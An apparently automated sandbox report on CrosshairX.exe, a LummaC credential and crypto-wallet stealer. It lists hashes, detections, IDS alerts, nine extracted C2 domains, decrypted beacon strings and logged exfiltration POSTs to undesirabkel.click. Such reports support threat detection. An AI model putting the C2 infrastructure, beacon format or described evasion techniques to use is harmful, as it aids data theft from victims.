Edit tour

Windows Analysis Report
CrosshairX.exe

Overview

General Information

Sample name:	CrosshairX.exe
Analysis ID:	1584542
MD5:	69bd9be788d02879474d95c9a50beb16
SHA1:	f29aeddeb31b109bdabb519c9dc8204ade7e2fb8
SHA256:	5685c21f0fea45d3b474e4f33689a444e7961b3fb2fed82502518931e7239ccc
Tags:	de-pumpedexeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to modify clipboard data

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

CrosshairX.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\CrosshairX.exe" MD5: 69BD9BE788D02879474D95C9A50BEB16)

conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

CrosshairX.exe (PID: 7388 cmdline: "C:\Users\user\Desktop\CrosshairX.exe" MD5: 69BD9BE788D02879474D95C9A50BEB16)

CrosshairX.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\CrosshairX.exe" MD5: 69BD9BE788D02879474D95C9A50BEB16)

WerFault.exe (PID: 7488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7320 -s 928 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["framekgirus.shop", "tirepublicerj.shop", "abruptyopsn.shop", "noisycuttej.shop", "wholersorie.shop", "undesirabkel.click", "cloudewahsj.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "LPnhqo--imqylxxhmnff"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: CrosshairX.exe PID: 7396	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: CrosshairX.exe PID: 7396	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:59:54.564025+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	188.114.96.3	443	TCP
2025-01-05T19:59:58.714037+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-05T19:59:59.804416+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-05T20:00:00.900774+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	188.114.96.3	443	TCP
2025-01-05T20:00:02.258764+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	188.114.96.3	443	TCP
2025-01-05T20:00:03.450246+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	188.114.96.3	443	TCP
2025-01-05T20:00:05.062265+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	188.114.96.3	443	TCP
2025-01-05T20:00:07.871288+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:59:58.180114+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	188.114.96.3	443	TCP
2025-01-05T19:59:59.190509+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-05T20:00:08.402270+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49745	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:59:58.180114+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:59:59.190509+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49736	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:59:54.564025+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	188.114.96.3	443	TCP
2025-01-05T19:59:58.714037+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-05T19:59:59.804416+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-05T20:00:00.900774+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49739	188.114.96.3	443	TCP
2025-01-05T20:00:02.258764+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49740	188.114.96.3	443	TCP
2025-01-05T20:00:03.450246+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49741	188.114.96.3	443	TCP
2025-01-05T20:00:05.062265+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49742	188.114.96.3	443	TCP
2025-01-05T20:00:07.871288+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49745	188.114.96.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:59:54.063845+0100	2058550	1	Domain Observed Used for C2 Detected	192.168.2.4	64399	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T20:00:01.390799+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49739	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: CrosshairX.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://undesirabkel.click/apiE	Avira URL Cloud: Label: malware
Source: undesirabkel.click	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/api=	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/apiA	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/F	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: 3.2.CrosshairX.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["framekgirus.shop", "tirepublicerj.shop", "abruptyopsn.shop", "noisycuttej.shop", "wholersorie.shop", "undesirabkel.click", "cloudewahsj.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "LPnhqo--imqylxxhmnff"}

Machine Learning detection for sample

Source: CrosshairX.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: undesirabkel.click
Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: LPnhqo--imqylxxhmnff

Source: C:\Users\user\Desktop\CrosshairX.exe

Code function: 3_2_0041616F CryptUnprotectData,

3_2_0041616F

Source: CrosshairX.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: CrosshairX.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Handler.pdbxa source: CrosshairX.exe
Source:	Binary string: System.Windows.Forms.pdb source: WER21F9.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb source: WER21F9.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WER21F9.tmp.dmp.6.dr
Source:	Binary string: System.pdbh source: WER21F9.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WER21F9.tmp.dmp.6.dr
Source:	Binary string: Handler.pdb source: CrosshairX.exe, WER21F9.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER21F9.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdb source: WER21F9.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WER21F9.tmp.dmp.6.dr

Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+64h]	3_2_00426970
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	3_2_004453C0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then cmp byte ptr [eax+edi+09h], 00000000h	3_2_0043DCC0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov byte ptr [ecx], bl	3_2_0040D7E3
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov edx, eax	3_2_0041C079
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+6EE4CA62h]	3_2_0042C006
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	3_2_004150C0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	3_2_004150C0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+4B6F866Ah]	3_2_0041A8F0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-000000D8h]	3_2_0041A8F0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_004310BA
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_00431150
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0040F15C
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00432966
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0043106C
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov edx, eax	3_2_0041E930
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_004311C0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-60DFD4D8h]	3_2_004429A0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_004311B1
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	3_2_0042CA41
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov byte ptr [edi], bl	3_2_00409200
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then push edi	3_2_0043EAD0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+05h]	3_2_0043F2A0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov edx, ecx	3_2_0043F2A0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movzx esi, word ptr [ebp+edx+02h]	3_2_0043F2A0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	3_2_0042FB40
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov word ptr [edi], cx	3_2_0041A368
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov word ptr [ecx], si	3_2_004223E6
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then cmp word ptr [eax+edx+02h], 0000h	3_2_0040B3A0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then push edi	3_2_00415BA0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-00000096h]	3_2_0042C44F
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov ecx, eax	3_2_0042A450
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov word ptr [ecx], dx	3_2_00418459
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov ecx, edx	3_2_00444C10
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov ecx, eax	3_2_0042A430
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_0043AC30
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	3_2_0042CC9C
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edx-4FD5DA21h]	3_2_004094A0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_0042DCA0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov ecx, eax	3_2_0041BD50
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	3_2_0041FD70
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0040E579
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0040E579
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov word ptr [edx], cx	3_2_0041D510
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C18AD805h	3_2_0040D520
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	3_2_00407640
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	3_2_00407640
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	3_2_00429670
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov eax, dword ptr [0044CCB8h]	3_2_00429670
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then test edi, edi	3_2_00408E10
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then cmp cl, 0000002Eh	3_2_0042A630
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov ecx, eax	3_2_0042A630
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then test esi, esi	3_2_0043EEC0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-00000096h]	3_2_0042C68E
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_0043169D
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	3_2_0042F6A0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]	3_2_004296AB
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	3_2_00441740
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then mov ecx, eax	3_2_0042AF1D
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 4x nop then movsx edx, byte ptr [esi+eax]	3_2_0041FFE0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058550 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click) : 192.168.2.4:64399 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49740 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49741 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49742 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49739 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: undesirabkel.click
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DY2BFWBA8KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18122Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6OSCRFZND7NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8749Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GKSN1WXAJIFXQYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20420Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1Y1TTNGEO4AYPGMRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 996Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=S9SIMVXLDN9Z4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570446Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: undesirabkel.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: undesirabkel.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click

Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
